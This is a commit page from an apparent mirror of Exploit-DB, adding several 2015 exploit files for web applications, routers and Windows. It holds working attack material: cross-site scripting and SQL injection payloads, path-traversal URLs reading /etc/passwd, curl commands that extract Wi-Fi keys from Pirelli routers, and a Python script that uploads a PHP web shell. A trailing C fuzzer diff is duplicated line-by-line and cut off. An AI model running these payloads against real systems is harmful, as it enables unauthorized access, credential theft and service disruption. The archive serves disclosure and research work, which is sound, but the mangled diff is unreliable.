bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Update: 2015-01-09

Browse source 
17 new exploits
This commit is contained in:
Offensive Security 2015-01-09 08:35:34 +00:00
parent 9a82f302ee
commit 3210d198cc
20 changed files with 1273 additions and 669 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

695
files.csv
View file

File diff suppressed because it is too large Load diff

11
platforms/asp/webapps/35728.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/47772/info
Keyfax Customer Response Management is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Keyfax Customer Response Management 3.2.2.6 is vulnerable; other versions may also be affected.
http://www.example.com/keyfax32/test/response.asp?co="style%3d"x:expression(alert(1))""%20";
http://www.example.com/keyfax32/rs/main_rs.asp?C="style%3d"x:expression(alert(1))""%20";

128
platforms/hardware/webapps/35721.txt Executable file
View file

@ -0,0 +1,128 @@
- Title:
CVE-2015-0554 ADB BroadBand Pirelli ADSL2/2+ Wireless Router P.DGA4001N remote information disclosure
HomeStation Movistar
- Author:
Eduardo Novella @enovella_
ednolo[@]inf.upv[dot]es
- Version:
Tested on firmware version PDG_TEF_SP_4.06L.6
- Shodan dork :
+ "Dropbear 0.46 country:es" ( From now on it looks like not working on this way)
- Summary:
HomeStation movistar has deployed routers manufactured by Pirelli. These routers are vulnerable to fetch HTML code from any
IP public over the world. Neither authentication nor any protection to avoid unauthorized extraction of sensitive information.
- The vulnerability and the way to exploit it:
$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "WLAN_"
<option value='0'>WLAN_DEAD</option>
$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var wpapskkey"
var wpaPskKey = 'IsAklFHhFFui1sr9ZMqD';
$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var WscDevPin"
var WscDevPin = '12820078';
$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var sessionkey"
var sessionKey='1189641421';
$ curl -s http://${IP_ADDRESS}/wlcfg.html | grep -i "bssid:" -A 3
<td width="50">BSSID:</td>
<td>
DC:0B:1A:XX:XX:XX
</td>
# Rebooting the router remotely and provoking a Denial of Service
#-----------------------------------------------------------------
http://${IP_ADDRESS}/resetrouter.html
We can observe at the source:
<!-- hide
var sessionKey='846930886';
function btnReset() {
var loc = 'rebootinfo.cgi?';
loc += 'sessionKey=' + sessionKey;
var code = 'location="' + loc + '"';
eval(code);
}
// done hiding -->
http://${IP_ADDRESS}/rebootinfo.cgi?sessionKey=233665123
# All the information what we can fetch from.
#----------------------------------------------
webs$ ls
adslcfgadv.html diagpppoe.html ipv6lancfg.html qoscls.html statsatmreset.html
adslcfgc.html dlnacfg.html js qosqmgmt.html statsifc.html
adslcfg.html dnscfg.html jsps qosqueueadd.html statsifcreset.html
adslcfgtone.html dnsproxycfg.html lancfg2.html qsmain.html statsmocalanreset.html
algcfg.html dsladderr.html languages quicksetuperr.html statsmocareset.html
APIS dslbondingcfg.html lockerror.html quicksetup.html statsmocawanreset.html
atmdelerr.html enblbridge.html logconfig.html quicksetuptesterr.html statsvdsl.html
backupsettings.html enblservice.html logintro.html quicksetuptestsucc.html statsvdslreset.html
berrun.html engdebug.html logobkg.gif rebootinfo.html statswanreset.html
berstart.html ethadderr.html logoc.gif resetrouter.html statsxtmreset.html
berstop.html ethdelerr.html logo_corp.gif restoreinfo.html storageusraccadd.html
certadd.html footer.html logo.html routeadd.html stylemain.css
certcaimport.html hlpadslsync.html logomenu.gif rtdefaultcfgerr.html threeGPIN.html
certimport.html hlpatmetoe.html main.html rtdefaultcfg.html todadd.html
certloadsigned.html hlpatmseg.html menuBcm.js scdmz.html tr69cfg.html
cfgatm.html hlpethconn.html menu.html scinflt.html updatesettings.html
cfgeth.html hlppngdns.html menuTitle.js scmacflt.html upload.html
cfgl2tpac.html hlppnggw.html menuTree.js scmacpolicy.html uploadinfo.html
cfgmoca.html hlppppoasess.html mocacfg.html scoutflt.html upnpcfg.html
cfgptm.html hlppppoeauth.html multicast.html scprttrg.html url_add.html
colors.css hlppppoeconn.html natcfg2.html scripts util.js
config.json.txt hlppppoeip.html ntwksum2.html scvrtsrv.html wanadderr.html
css hlptstdns.html omcidownload.html seclogintro.html wancfg.html
ddnsadd.html hlpusbconn.html omcisystem.html snmpconfig.html wlcfgadv.html
defaultsettings.html hlpwlconn.html password.html sntpcfg.html wlcfg.html
dhcpinfo.html html portmapadd.html standby.html wlcfgkey.html
diag8021ag.html ifcdns.html portmapedit.html StaticIpAdd.html wlmacflt.html
diagbr.html ifcgateway.html portName.js StaticIpErr.html wlrefresh.html
diag.html images pppoe.html statsadslerr.html wlsecurity.html
diagipow.html index.html pradd.html statsadsl.html wlsetup.html
diaglan.html info.html ptmadderr.html statsadslreset.html wlwapias.html
diagmer.html ipoacfg.html ptmdelerr.html statsatmerr.html xdslcfg.html
diagpppoa.html ippcfg.html pwrmngt.html statsatm.html
+ Conclusion:
This vulnerability can be exploited remotely and it should be patched as soon as possible. An attacker could be monitoring our network
or even worse being a member of a botnet without knowledge of it.
First mitigation could be either try to update the last version for these routers or install 3rd parties firmwares as OpenWRT or DDWRT on them.
+ References:
http://packetstormsecurity.com/files/115663/Alpha-Networks-ADSL2-2-Wireless-Router-ASL-26555-Password-Disclosure.html
+ Timeline:
2013-04-xx Send email to Movistar and Pirelli
2015-01-05 Full disclosure

19
platforms/multiple/dos/35725.pl Executable file
View file

@ -0,0 +1,19 @@
source: http://www.securityfocus.com/bid/47766/info
Perl is prone to multiple denial-of-service vulnerabilities caused by a NULL-pointer dereference.
An attacker can exploit these issues to cause an affected application to crash, denying service to legitimate users.
Perl versions 5.10.x are vulnerable.
jonathan () blackbox:~/test$ cat poc1.pl
#!/usr/bin/perl
$a =
getsockname(9505,4590,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAA",17792);
jonathan () blackbox:~/test$ perl poc1.pl
Segmentation fault (core dumped)
jonathan () blackbox:~/test$

7
platforms/multiple/remote/35729.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/47780/info
Imperva SecureSphere is prone to a security-bypass vulnerability.
An attacker can leverage this vulnerability to bypass certain security restrictions. Successful exploits may allow attackers to exploit SQL-injection vulnerabilities.
15 and '1'=(SELECT '1' FROM dual) and '0having'='0having'

9
platforms/php/webapps/35713.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47751/info
FestOS is prone to an arbitrary-file-upload vulnerability because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this issue to upload arbitrary code and run it in the context of the webserver process.
FestOS 2.3c is vulnerable; other versions may also be affected.
http://www.example.com/[path]/admin/includes/tiny_mce/plugins/tinybrowser/upload.php

9
platforms/php/webapps/35715.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47755/info
encoder is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
encoder 0.4.10 is vulnerable; other versions may also be affected.
http://www.example.com/ecoder-0.4.10/edit.php?editor=&mode=%22%3E%3Cscript%3Ealert(0)%3C/script%3E&path=%22%3E%3Cscript%3Ealert(0)%3C/script%3E&file=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

9
platforms/php/webapps/35716.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47756/info
Ampache is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Ampache 3.5.4 is vulnerable; other versions may also be affected.
<html> <body onload="document.forms[0].submit()"> <form method="POST" action="http://localhost/ampache-3.5.4/login.php"> <input type="hidden" name="username" value=""><script>alert(0)</script>" /> </form> </body> </html>

9
platforms/php/webapps/35717.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47757/info
Exponent CMS is prone to a local file-include vulnerability and an arbitrary-file-upload vulnerability.
An attacker can exploit these issues to upload arbitrary files onto the webserver, execute arbitrary local files within the context of the webserver, and obtain sensitive information.
Exponent CMS 2.0.0 beta 1.1 is vulnerable; other versions may also be affected.
http://www.example.com/exponent/content_selector.php?controller=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00&section=&action=

9
platforms/php/webapps/35718.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47758/info
Gelsheet is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Gelsheet 1.02 is vulnerable; other versions may also be affected.
http://www.example.com/fengoffice/public/assets/javascript/gelSheet/index.php?id=%3Cscript%3Ealert%280%29%3C/script%3E&wid=%3Cscript%3Ealert%280%29%3C/script%3E&book=%3Cscript%3Ealert%280%29%3C/script%3E

116
platforms/php/webapps/35719.py Executable file
View file

@ -0,0 +1,116 @@
source: http://www.securityfocus.com/bid/47759/info
phpWebSite is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
phpWebSite 1.7.1 is vulnerable; other versions may also be affected.
# ------------------------------------------------------------------------
# Software................phpWebSite 1.7.1
# Vulnerability...........Arbitrary Upload
# Threat Level............Very Critical (5/5)
# Download................http://phpwebsite.appstate.edu/
# Discovery Date..........5/5/2011
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................AutoSec Tools
# Site....................http://www.autosectools.com/
# Email...................John Leitch <john@autosectools.com>
# ------------------------------------------------------------------------
#
#
# --Description--
#
# An arbitrary upload vulnerability in phpWebSite 1.7.1 can be exploited
# to upload a PHP shell.
#
#
# --PoC--
import socket
host = 'localhost'
path = '/phpwebsite_1_7_1'
shell_path = path + '/javascript/editors/fckeditor/editor/filemanager/upload/phpws/.shell'
port = 80
def upload_shell():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)
s.send('POST ' + path + '/javascript/editors/fckeditor/editor/filemanager/upload/phpws/upload.php?local=.htaccess HTTP/1.1\r\n'
'Host: localhost\r\n'
'Proxy-Connection: keep-alive\r\n'
'User-Agent: x\r\n'
'Content-Length: 223\r\n'
'Cache-Control: max-age=0\r\n'
'Origin: null\r\n'
'Content-Type: multipart/form-data; boundary=----x\r\n'
'Accept: text/html\r\n'
'Accept-Encoding: gzip,deflate,sdch\r\n'
'Accept-Language: en-US,en;q=0.8\r\n'
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
'\r\n'
'------x\r\n'
'Content-Disposition: form-data; name="NewFile"; filename=".htaccess"\r\n'
'Content-Type: application/octet-stream\r\n'
'\r\n'
'AddType application/x-httpd-php .shell\r\n'
'\r\n'
'Action application/x-httpd-php "/php/php.exe"\r\n'
'------x--\r\n'
'\r\n')
resp = s.recv(8192)
http_ok = 'HTTP/1.1 200 OK'
if http_ok not in resp[:len(http_ok)]:
print 'error uploading .htaccess'
return
else: print '.htaccess uploaded'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)
s.send('POST ' + path + '/javascript/editors/fckeditor/editor/filemanager/upload/phpws/upload.php?local=.htaccess HTTP/1.1\r\n'
'Host: localhost\r\n'
'Proxy-Connection: keep-alive\r\n'
'User-Agent: x\r\n'
'Content-Length: 163\r\n'
'Cache-Control: max-age=0\r\n'
'Origin: null\r\n'
'Content-Type: multipart/form-data; boundary=----x\r\n'
'Accept: text/html\r\n'
'Accept-Encoding: gzip,deflate,sdch\r\n'
'Accept-Language: en-US,en;q=0.8\r\n'
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
'\r\n'
'------x\r\n'
'Content-Disposition: form-data; name="NewFile"; filename=".shell"\r\n'
'Content-Type: application/octet-stream\r\n'
'\r\n'
'<?php system($_GET["CMD"]); ?>\r\n'
'------x--\r\n'
'\r\n')
resp = s.recv(8192)
http_ok = 'HTTP/1.1 200 OK'
if http_ok not in resp[:len(http_ok)]:
print 'error uploading shell'
return
else: print 'shell uploaded'
s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\
'Host: ' + host + '\r\n\r\n')
print 'shell located at http://' + host + shell_path
upload_shell()

29
platforms/php/webapps/35720.txt Executable file
View file

@ -0,0 +1,29 @@
# Exploit Title: SQL Injection in Microweber CMS 0.95
# Google Dork: N/A
# Date: 12/16/2014
# Exploit Author: Pham Kien Cuong (cuong.k.pham@itas.vn) and ITAS Team (www.itas.vn)
# Vendor Homepage: Microweber (https://microweber.com/)
# Software Link: https://github.com/microweber/microweber
# Version: 0.95
# Tested on: N/A
# CVE : CVE-2014-9464
::PROOF OF CONCEPT::
GET /shop/category:[SQL INJECTION HERE] HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://target/shop
Cookie: mw-time546209978=2015-01-05+05%3A19%3A53; PHPSESSID=48500cad98b9fa857b9d82216afe0275
Connection: keep-alive
::REFERENCE::
- http://www.itas.vn/news/itas-team-found-out-a-sql-injection-vulnerability-in-microweber-cms-69.html
- https://www.youtube.com/watch?v=SSE8Xj_-QaQ
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9464
::DISCLAIMER::
THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK.

72
platforms/php/webapps/35722.txt Executable file
View file

@ -0,0 +1,72 @@
Advisory: SQL-Injection in administrative Backend of Sefrengo CMS v.1.6.0
Advisory ID: SROEADV-2015-04
Author: Steffen Rösemann
Affected Software: CMS Sefrengo v.1.6.0 (Release-Date: 18th-Feb-2014)
Vendor URL: http://www.sefrengo.org/start/start.html
Vendor Status: fixed
CVE-ID: -
==========================
Vulnerability Description:
==========================
The Content Management System Sefrengo v.1.6.0 contains SQL-Injection
vulnerabilities in its administrative Backend.
==================
Technical Details:
==================
The administrative Backend of Sefrengo CMS contains a functionality to edit
folders which reside on the CMS. Its located here:
http://{TARGET}/backend/main.php?area=con_configcat&idcat=1&idtplconf=0
The parameter „idcat“ ist vulnerable against SQL-Injection. An attacker
could abuse this to send crafted URLs to the administrator via mail to
execute own SQL commands (e.g. create a second admin-account).
Exploit-Example:
http://
{TARGET}/backend/main.php?area=con_configcat&idcat=1'+and+'1'='2'+union+select+version(),user(),3,4+--+&idtplconf=0
Another SQL-Injection vulnerability can be found in the administrative
backend, where the admin can manage installed plugins. The vulnerable
parameter is „idclient“ in the following URL:
http://{TARGET}/backend/main.php?area=plug&idclient=1
Exploit-Example:
http://
{TARGET}/backend/main.php?area=plug&idclient=1%27+and+%271%27=%272%27+union+select+1,version%28%29,user%28%29,4,database%28%29,6,7,8,9,10,11,12,13,14+--+
=========
Solution:
=========
Update to the latest version
====================
Disclosure Timeline:
====================
21-Dec-2014 found the vulnerability
21-Dec-2014 - informed the developers
22-Dec-2014 - response by vendor
04-Jan-2015 fix by vendor
04-Jan-2015 - release date of this security advisory
04-Jan-2015 - post on BugTraq / FullDisclosure
========
Credits:
========
Vulnerability found and advisory written by Steffen Rösemann.
===========
References:
===========
http://www.sefrengo.org/start/start.html
http://sroesemann.blogspot.de

9
platforms/php/webapps/35723.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47762/info
TCExam is prone to multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
TCExam 11.1.029 is vulnerable; other versions may also be affected.
http://www.example.com/tcexam/admin/code/tce_xml_user_results.php?lang=&user_id=1&startdate=[SQL]&enddate=[SQL]&order_field=[SQL]

9
platforms/php/webapps/35724.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47763/info
EmbryoCore is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
EmbryoCore 1.03 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/index.php?page=[-!Blind SQLi Here!-]

58
platforms/php/webapps/35726.py Executable file
View file

@ -0,0 +1,58 @@
source: http://www.securityfocus.com/bid/47767/info
GetSimple is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
GetSimple 3.0 is vulnerable; other versions may also be affected.
# ------------------------------------------------------------------------
# Software................GetSimple 3.0
# Vulnerability...........Local File Inclusion
# Threat Level............Critical (4/5)
# Download................http://get-simple.info/
# Discovery Date..........5/4/2011
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................AutoSec Tools
# Site....................http://www.autosectools.com/
# Email...................John Leitch <john@autosectools.com>
# ------------------------------------------------------------------------
#
#
# --Description--
#
# A local file inclusion vulnerability in GetSimple 3.0 can be exploited
# to include arbitrary files.
#
#
# --PoC--
import socket
host = 'localhost'
path = '/getsimple_3.0'
trav_sequence = '..%2f' * 8 + 'windows%2fwin.ini'
port = 80
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)
s.send('POST ' + path + '/index.php?set=' + trav_sequence + ' HTTP/1.1\r\n'
'Host: localhost\r\n'
'Proxy-Connection: keep-alive\r\n'
'User-Agent: x\r\n'
'Content-Length: 0\r\n'
'Cache-Control: max-age=0\r\n'
'Origin: null\r\n'
'Content-Type: multipart/form-data; boundary=----x\r\n'
'Accept: text/html\r\n'
'Accept-Language: en-US,en;q=0.8\r\n'
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
'\r\n')
resp = s.recv(8192)
print resp

7
platforms/php/webapps/35727.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/47770/info
HOMEPIMA Design is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input.
Exploiting this vulnerability would allow an attacker to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.
http://www.example.com/setup/filedown.php?file=../../../../../../../../../../../../../../etc/passwd

358
platforms/windows/dos/3204.c
View file

@ -1,179 +1,179 @@
/* /*
Proof of concept exploit for ZDI - Citrix Metaframe spooler service vulnerability Proof of concept exploit for ZDI - Citrix Metaframe spooler service vulnerability
Microsoft Windows - EnumPrinter() & EnumPrinterW() Fuzzer v0.1 Microsoft Windows - EnumPrinter() & EnumPrinterW() Fuzzer v0.1
Author: Andres Tarasco Acuña - atarasco@514.es Author: Andres Tarasco Acuña - atarasco@514.es
url: http://www.514.es url: http://www.514.es
This is an intial version of EnumPrinter() and OpenPrinter() fuzzer. I hope that This is an intial version of EnumPrinter() and OpenPrinter() fuzzer. I hope that
it will help to identify similar vulnerabilities. it will help to identify similar vulnerabilities.
Tested against win2k3 + Citrix presentation server. If the system is vulnerable Tested against win2k3 + Citrix presentation server. If the system is vulnerable
this application will kill spooler service (spoolsv.exe ) and ret will be overwritten this application will kill spooler service (spoolsv.exe ) and ret will be overwritten
with 0x00410041 with 0x00410041
514 Tiger Team ownz u 514 Tiger Team ownz u
*/ */
#include <stdio.h> #include <stdio.h>
#include <windows.h> #include <windows.h>
#include <Winspool.h> #include <Winspool.h>
#pragma comment(lib,"Winspool.lib") #pragma comment(lib,"Winspool.lib")
void usage(char *name) { void usage(char *name) {
printf("Usage: %s -a (Ascii fuzzing for local printer providers)\n",name); printf("Usage: %s -a (Ascii fuzzing for local printer providers)\n",name);
printf("Usage: %s -u (Unicode fuzzing for local printer providers)\n",name); printf("Usage: %s -u (Unicode fuzzing for local printer providers)\n",name);
exit(0); exit(0);
} }
#define RECURSIVE 1 #define RECURSIVE 1
#define OPT_UNICODE 2 #define OPT_UNICODE 2
#define MAX_PRINTER_LEN 4096 #define MAX_PRINTER_LEN 4096
#define _DBG_ #define _DBG_
#undef _DBG_ #undef _DBG_
int CustomFuzzSize[]= {25,50,100,150,250,300,500,1000,1500, 2000}; int CustomFuzzSize[]= {25,50,100,150,250,300,500,1000,1500, 2000};
wchar_t dst[MAX_PRINTER_LEN]; wchar_t dst[MAX_PRINTER_LEN];
void Fuzzer( wchar_t *orig,int opt, int unicode) { void Fuzzer( wchar_t *orig,int opt, int unicode) {
int i,j; int i,j;
int len; int len;
if (unicode) len=wcslen(orig); if (unicode) len=wcslen(orig);
else len=strlen((char *)orig); else len=strlen((char *)orig);
memset((char *)dst,'\0',sizeof(dst)); memset((char *)dst,'\0',sizeof(dst));
memcpy((char *)dst,orig,len*(1+unicode)); memcpy((char *)dst,orig,len*(1+unicode));
j=wcslen(orig); j=wcslen(orig);
for(i=0;i<CustomFuzzSize[opt];i++) { for(i=0;i<CustomFuzzSize[opt];i++) {
if (unicode) dst[j+i]='A'; if (unicode) dst[j+i]='A';
else ((char *)dst)[j+i]=(char)'A'; else ((char *)dst)[j+i]=(char)'A';
} }
if (opt==0) { if (opt==0) {
if (unicode) if (unicode)
printf("Fuzzing: %S ( %i -%i)\n",dst,CustomFuzzSize[0],CustomFuzzSize[sizeof(CustomFuzzSize)/sizeof(int)-1]); printf("Fuzzing: %S ( %i -%i)\n",dst,CustomFuzzSize[0],CustomFuzzSize[sizeof(CustomFuzzSize)/sizeof(int)-1]);
else printf("Fuzzing: %s ( %i -%i)\n",dst,CustomFuzzSize[0],CustomFuzzSize[sizeof(CustomFuzzSize)/sizeof(int)-1]); else printf("Fuzzing: %s ( %i -%i)\n",dst,CustomFuzzSize[0],CustomFuzzSize[sizeof(CustomFuzzSize)/sizeof(int)-1]);
} }
} }
DWORD ShowPrinterInfo(wchar_t *lpName, int level, int opt, char *padding) { DWORD ShowPrinterInfo(wchar_t *lpName, int level, int opt, char *padding) {
unsigned char *lpInfo; unsigned char *lpInfo;
int i,j; int i,j;
DWORD n; DWORD n;
DWORD dwSizeNeeded=0; DWORD dwSizeNeeded=0;
char newpadding[50]; char newpadding[50];
DWORD ret; DWORD ret;
if (opt & OPT_UNICODE) { if (opt & OPT_UNICODE) {
EnumPrintersW ( PRINTER_ENUM_NAME, (wchar_t* )lpName, level, NULL, 0, &dwSizeNeeded, &n ); EnumPrintersW ( PRINTER_ENUM_NAME, (wchar_t* )lpName, level, NULL, 0, &dwSizeNeeded, &n );
} else { } else {
EnumPrintersA ( PRINTER_ENUM_NAME, (char *)lpName, level, NULL, 0, &dwSizeNeeded, &n ); EnumPrintersA ( PRINTER_ENUM_NAME, (char *)lpName, level, NULL, 0, &dwSizeNeeded, &n );
} }
if (dwSizeNeeded==0) { if (dwSizeNeeded==0) {
#ifdef _DBG_ #ifdef _DBG_
printf ( "EnumPrintersX() Invalid. Error: %d \n",GetLastError() ); printf ( "EnumPrintersX() Invalid. Error: %d \n",GetLastError() );
#endif #endif
return(-1); return(-1);
} }
lpInfo = (void *)HeapAlloc ( GetProcessHeap (), HEAP_ZERO_MEMORY, dwSizeNeeded ); lpInfo = (void *)HeapAlloc ( GetProcessHeap (), HEAP_ZERO_MEMORY, dwSizeNeeded );
if ( lpInfo != NULL ) { if ( lpInfo != NULL ) {
if (opt & OPT_UNICODE) { if (opt & OPT_UNICODE) {
ret=EnumPrintersW ( PRINTER_ENUM_NAME,(wchar_t *)lpName,level,(LPBYTE)lpInfo,dwSizeNeeded,&dwSizeNeeded,&n); ret=EnumPrintersW ( PRINTER_ENUM_NAME,(wchar_t *)lpName,level,(LPBYTE)lpInfo,dwSizeNeeded,&dwSizeNeeded,&n);
} else { } else {
ret=EnumPrintersA ( PRINTER_ENUM_NAME,(char *)lpName,level,(LPBYTE)lpInfo,dwSizeNeeded,&dwSizeNeeded,&n); ret=EnumPrintersA ( PRINTER_ENUM_NAME,(char *)lpName,level,(LPBYTE)lpInfo,dwSizeNeeded,&dwSizeNeeded,&n);
} }
if ( ret== 0 ) if ( ret== 0 )
{ {
#ifdef _DBG_ #ifdef _DBG_
printf ( "EnumPrintersX() Failed. Error: %d ( %i)\n",GetLastError(),dwSizeNeeded ); printf ( "EnumPrintersX() Failed. Error: %d ( %i)\n",GetLastError(),dwSizeNeeded );
#endif #endif
HeapFree ( GetProcessHeap (), 0, lpInfo ); HeapFree ( GetProcessHeap (), 0, lpInfo );
return 0; return 0;
} else { } else {
PRINTER_INFO_1 *dataI; PRINTER_INFO_1 *dataI;
PRINTER_INFO_2 *dataII; PRINTER_INFO_2 *dataII;
for ( i=0; i < n; i++ ) { for ( i=0; i < n; i++ ) {
dataI=(PRINTER_INFO_1*)lpInfo; dataI=(PRINTER_INFO_1*)lpInfo;
printf("%s",padding); printf("%s",padding);
if (opt & OPT_UNICODE) { if (opt & OPT_UNICODE) {
if (dataI[i].pName) printf(" %S - ",(dataI[i].pName)); if (dataI[i].pName) printf(" %S - ",(dataI[i].pName));
if (dataI[i].pDescription) printf(" %S ",(dataI[i].pDescription)); if (dataI[i].pDescription) printf(" %S ",(dataI[i].pDescription));
//if (dataI[i].pComment) printf(" %S - ",(dataI[i].pComment)); //if (dataI[i].pComment) printf(" %S - ",(dataI[i].pComment));
} else { } else {
if (dataI[i].pName) printf(" %s - ",(dataI[i].pName)); if (dataI[i].pName) printf(" %s - ",(dataI[i].pName));
if (dataI[i].pDescription) printf(" %s ",(dataI[i].pDescription)); if (dataI[i].pDescription) printf(" %s ",(dataI[i].pDescription));
//if (dataI[i].pComment) printf(" %s - ",(dataI[i].pComment)); //if (dataI[i].pComment) printf(" %s - ",(dataI[i].pComment));
} }
printf("\n"); printf("\n");
for(j=0;j<sizeof(CustomFuzzSize)/sizeof(int);j++) { for(j=0;j<sizeof(CustomFuzzSize)/sizeof(int);j++) {
if (opt & OPT_UNICODE) { if (opt & OPT_UNICODE) {
Fuzzer( (wchar_t *) dataI[0].pName, j,opt & OPT_UNICODE); Fuzzer( (wchar_t *) dataI[0].pName, j,opt & OPT_UNICODE);
ShowPrinterInfo((wchar_t*)dst,level, OPT_UNICODE, newpadding); ShowPrinterInfo((wchar_t*)dst,level, OPT_UNICODE, newpadding);
} else { } else {
Fuzzer( (wchar_t *) dataI[0].pName, j,opt & OPT_UNICODE); Fuzzer( (wchar_t *) dataI[0].pName, j,opt & OPT_UNICODE);
ShowPrinterInfo((wchar_t*)dst,level, 0, newpadding); ShowPrinterInfo((wchar_t*)dst,level, 0, newpadding);
} }
} }
if (opt & RECURSIVE ) { if (opt & RECURSIVE ) {
strcpy (newpadding,padding); strcpy (newpadding,padding);
strcat(newpadding,"---"); strcat(newpadding,"---");
newpadding[1]='+'; newpadding[1]='+';
ShowPrinterInfo(dataI[i].pName,level, opt, newpadding); ShowPrinterInfo(dataI[i].pName,level, opt, newpadding);
} }
printf("\n"); printf("\n");
} }
HeapFree ( GetProcessHeap (), 0, lpInfo ); HeapFree ( GetProcessHeap (), 0, lpInfo );
} }
} }
return(1); return(1);
} }
int testPrinters(void) { int testPrinters(void) {
DWORD size,ret,err; DWORD size,ret,err;
ret=EnumPrintersW ( PRINTER_ENUM_NAME, NULL, 1, NULL, 0, &size, &size ); ret=EnumPrintersW ( PRINTER_ENUM_NAME, NULL, 1, NULL, 0, &size, &size );
if ( ret==0 ) { if ( ret==0 ) {
err=GetLastError(); err=GetLastError();
if (err!=122) { //size error if (err!=122) { //size error
printf("[-] Printer Service not available - Error: %d\n",err ); printf("[-] Printer Service not available - Error: %d\n",err );
exit(-1); exit(-1);
} }
} }
return(1); return(1);
} }
int main ( int argc, char *argv[] ) int main ( int argc, char *argv[] )
{ {
printf("[+] Citrix Presentation Server - Local EnumPrinterW() POC exploit\n"); printf("[+] Citrix Presentation Server - Local EnumPrinterW() POC exploit\n");
printf("[+] Discovered by ZDI - http://secunia.com/advisories/23869/\n"); printf("[+] Discovered by ZDI - http://secunia.com/advisories/23869/\n");
printf("[+] Proof of concept by Andres Tarasco - atarasco@514.es\n\n"); printf("[+] Proof of concept by Andres Tarasco - atarasco@514.es\n\n");
